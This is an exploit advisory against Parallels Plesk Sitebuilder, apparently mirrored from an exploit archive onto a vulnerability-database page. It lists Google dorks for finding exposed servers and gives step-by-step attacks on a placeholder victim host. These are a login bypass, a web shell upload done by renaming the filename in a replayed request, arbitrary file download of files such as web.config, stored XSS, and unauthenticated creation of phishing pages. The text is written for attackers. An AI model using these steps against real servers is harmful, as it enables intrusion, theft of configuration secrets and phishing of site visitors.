Vulners
Lucene search
Parallels Plesk Sitebuilder 9.5 - Multiple Vulnerabilities
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Title : Multiple Vulnerabilities in Parallels® Plesk Sitebuilder
# Author : alieye
# vendor : http://www.parallels.com/
# Contact : [email protected]
# Risk : High
# Class: Remote
#
# Google Dork:
# inurl::2006/Sites ext:aspx
# inurl::2006 inurl:.ashx?mediaid
# intext:"© Copyright 2004-2007 SWsoft." ext:aspx
# inurl:Wizard/HostingPreview.aspx?SiteID
#
# Date: 23/07/2014
# os : windows server 2003
# poc video clip : http://alieye.persiangig.com/video/plesk.rar/download
#
# version : for uploading shell (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2010
# version : for other bug (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2014
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++
1-bypass loginpage (all version)
http://victim.com:2006/login.aspx
change url path to http://victim.com:2006/wizard
---------------------------------------------------------
2-uploading shell via Live HTTP Headers(Copyright 2004-2010)
Tools Needed: Live HTTP Headers, Backdoor Shell
Step 1: Locate upload form on logo upload section in http://victim.com:2006/Wizard/DesignLayout.aspx
Step 2: Rename your shell to shell.asp.gif and start capturing data with
Live HTTP Headers
Step 3: Replay data with Live HTTP Headers -
Step 4: Change [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.gif"\r\n] to [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.asp"\r\n]
Step 5: go to shell path:
http://victim.com:2006/Sites/GUID Sitename created/App_Themes/green/images/shell_asp.asp
---------------------------------------------------------
3-Arbitrary File Download Vulnerability(all version)
You can download any file from your target
http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID Sitename created&p=filename
example:
http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790b&p=web.config
---------------------------------------------------------
4-xss(all version)
you can inject xss code in all module of this page http://victim.com:2006/Wizard/Edit.aspx
goto this page (edit.aspx), click on one module (Blog-eShop-Forum-...) then goto "Add New Category" and insert xss code in Category description and .... Enjoy :)
---------------------------------------------------------
5-not authentication for making a website(all version)
making malicious page and phishing page with these paths
http://victim.com:2006/Wizard/Pages.aspx
http://victim.com:2006/Wizard/Edit.aspx
# 0day.today [2018-02-19] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Oct 2014 00:00Current
7.1High risk
Vulners AI Score7.1